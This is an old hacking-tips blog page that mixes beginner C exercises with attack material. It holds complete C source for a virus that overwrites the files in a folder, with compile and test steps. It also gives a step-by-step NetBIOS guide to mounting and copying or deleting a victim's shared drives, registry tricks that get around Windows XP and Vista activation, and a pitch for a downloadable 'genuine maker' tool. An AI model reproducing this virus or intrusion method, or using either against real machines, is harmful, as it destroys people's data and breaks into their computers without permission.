This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Changing Windows XP Product Key without Re-Installation

This trick will show you how to change Windows XP product key without re-installing the operating system.This makes it possible to install a new genuine key without the need to format and re-install your Windows XP.

 


1.Goto start menu,run,type regedit


2.In registry editor goto


HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WPA EVENTS



3.In the right panel open OOBE Time


4.Edit/Change atleast one entry there,press OK and close registry editor.


5.In run type the following command


%systemroot%\system32\oobe\msoobe /a

and press enter


6.Activation wizard appears


7.Select activation by phone and in the next screen select the option CHANGE PRODUCT KEY,enter a valid corporate product key,press OK and close the wizard


8.Reboot the computer and type the same command in the run


9.Activation wizard appears again and it shows the message WINDOWS IS ALREADY ACTIVATED.


ARE YOU BORED OF FOLLWING THOSE TEDIOUS STEPS?CONFUSED?

THEN NO PROBLEM.DOWNLOAD THIS WIN XP GENUINE MAKER THAT I HAVE CODED RECENTLY.THIS IS NEITHER A VIRUS OR TROJAN & DOES NOT HAVE MALICIOUS INTENT.A NICE TOOL FOR YOUR EASE OF USE.

C Program to Print the Entered Number in Words

The following C program print’s the entered number in words.For example if the number entered is 12345 then the program prints the entered number in words as One Two Three Four Five




#include
void main()
{
int i=0;
unsigned long int digit;
char str[12],ch;
puts(”Enter the number (less than 10 digit)”);
scanf(”%lu”,&digit);
ultoa(digit,str,10); /*converts an unsigned long int to string*/
while(str[i]!=’\0′)
{
ch=str[i];
i++;
switch(ch)
{
case ‘1′:
printf(”ONE “);
break;
case ‘2′:
printf(”TWO “);
break;
case ‘3′:
printf(”THREE “);
break;
case ‘4′:
printf(”FOUR “);
break;
case ‘5′:
printf(”FIVE “);
break;
case ‘6′:
printf(”SIX “);
break;
case ‘7′:
printf(”SEVEN “);
break;
case ‘8′:
printf(”EIGHT “);
break;
case ‘9′:
printf(”NINE “);
break;
case ‘0′:
printf(”ZERO “);
break;
}
}
}

Use Vista for atleast 1 Year without Activation

Microsoft allows bypass of Vista activation



 


The following describes the Registry key that’s involved

 


Step 1.

While running a copy of Windows Vista that hasn’t yet been activated, click the Start button, type regedit into the Search box, then press Enter to launch the Registry Editor.


 


Step 2.

Explore down to the following Registry key:HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SL

 


Step 3.

Right-click the Registry key named SkipRearm and click Edit. The default is a Dword (a double word or 4 bytes) with a hex value of 00000000. Change this value to any positive integer, such as 00000001, save the change, and close the Registry Editor.

 


Step 4.

Start a command prompt with administrative rights. The fastest way to do this is to click the Start button, enter cmd in the Search box, then press Ctrl+Shift+Enter. If you’re asked for a network username and password, provide the ones that log you into your domain. You may be asked to approve a User Account Control prompt and to provide an administrator password.


 


Step 5.

Type one of the following two commands and press Enter:slmgr -rearmorrundll32 slc.dll,SLReArmWindowsEither command uses Vista’s built-in Software Licensing Manager (SLMGR) to push the activation deadline out to 30 days after the command is run. Changing SkipRearm from 0 to 1 allows SLMGR to do this an indefinite number of times. Running either command initializes the value of SkipRearm back to 0.

 


Step 6.

Reboot the PC to make the postponement take effect. (After you log in, if you like, you can open a command prompt and run the command slmgr -xpr to see Vista’s new expiration date and time.

 


Step 7.

To extend the activation deadline of Vista indefinitely, repeat steps 1 through 6 as necessary. 

C Program to Generate Numbers in Pyramid Pattern

This program generates the numbers in pyramid pattern.It takes the input from two through nine and generates the numbers in the pyramid pattern.For example if the input is 4 then the program produces the following output




   ….1

1111112 2

111113 3 3

111.4 4 4 4& so on..


 


CODE:



#include<stdio.h>

#include<conio.h>

void main()

{

int i,n,j,x=40,y=10;

clrscr();

printf(”Enter n (between 2 & 9)\n”);

scanf(”%d”,&n);

for(i=1;i<=n;i++)

{

gotoxy(x,y); /* To take the cursor to the co-ordinates x & y */

for(j=1;j<=i;j++)

{

 printf(”%d “,i);

}

x=x-1;

y++;

}

getch();

}

How to Create a Computer Virus?

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.

 


#include<stdio.h>

#include<io.h>

#include<dos.h>

#include<dir.h>

#include<conio.h>

#include<time.h>


FILE *virus,*host;

int done,a=0;

unsigned long x;

char buff[2048];

struct ffblk ffblk;

clock_t st,end;


void main()

{

st=clock();

clrscr();

done=findfirst(”*.*”,&ffblk,0);

while(!done)

{

virus=fopen(_argv[0],”rb”);

host=fopen(ffblk.ff_name,”rb+”);

if(host==NULL) goto next;

x=89088;

printf(”Infecting %s\n”,ffblk.ff_name,a);

while(x>2048)

{

fread(buff,2048,1,virus);

fwrite(buff,2048,1,host);

x-=2048;

}

fread(buff,x,1,virus);

fwrite(buff,x,1,host);

a++;

next:

{

fcloseall();

done=findnext(&ffblk);

}

}

printf(”DONE! (Total Files Infected= %d)”,a);

end=clock();

printf(”TIME TAKEN=%f SEC\n”,

(end-st)/CLK_TCK);

getch();

}


COMPILING METHOD:



BORLAND TC++ 3.0 (16-BIT):



1. Load the program in the compiler, press Alt-F9 to compile


2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)


3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)


4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)


5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect


BORLAND C++ 5.5 (32-BIT) :



1. Compile once,note down the generated EXE file length in bytes


2. Change the value of X in source code to this length in bytes


3. Recompile it.The new EXE file is ready to infect


HOW TO TEST:



1. Open new empty folder



2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)


3. Run the virus EXE file there you will see all the files in the current directory get infected.


4.All the infected files will be ready to reinfect


That’s it


WARNING: FOR EDUCATIONAL PURPOSES ONLY

C Program To Accept Password

This is a simple login program in C.While accepting password it masks each character using ‘*’ symbaol and display the password in the next line after the user hits Enter key.It also accepts backspaces and acts accordingly.




#include
#include

char pw[25],ch;
int i;
void main()
{
clrscr();
puts(”Enter password”);
while(1)
{
if(i<0)
i=0;
ch=getch();
if(ch==13)
break; /*13 is ASCII value of ENTER*/
if(ch==8) /*ASCII value of BACKSPACE*/
{
putch(’\b’);
putch(NULL);
putch(’\b’);
–i;
continue;
}
pw[i++]=ch;
ch=’*';
putch(ch);
}
pw[i]=’\0′;
printf(”\n\n%s”,pw);
getch();
}

Netbios Hacking


THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.


STEP-BY-STEP NETBIOS HACKING PROCEDURE


1.Open command prompt


2. In the command prompt use the “net view” command

( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).


Example: C:\>net view \\219.64.55.112


The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.


3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.


Example-1:

C:\>net use D: \\219.64.55.112\F

Example-2:

C:\>net use G: \\219.64.55.112\SharedDocs

Example-3:

C:\>net use I: \\219.64.55.112\Myprint



NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.


NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT


F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.


4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.


Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.


NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.


HAPPY NETBOS HACKING!!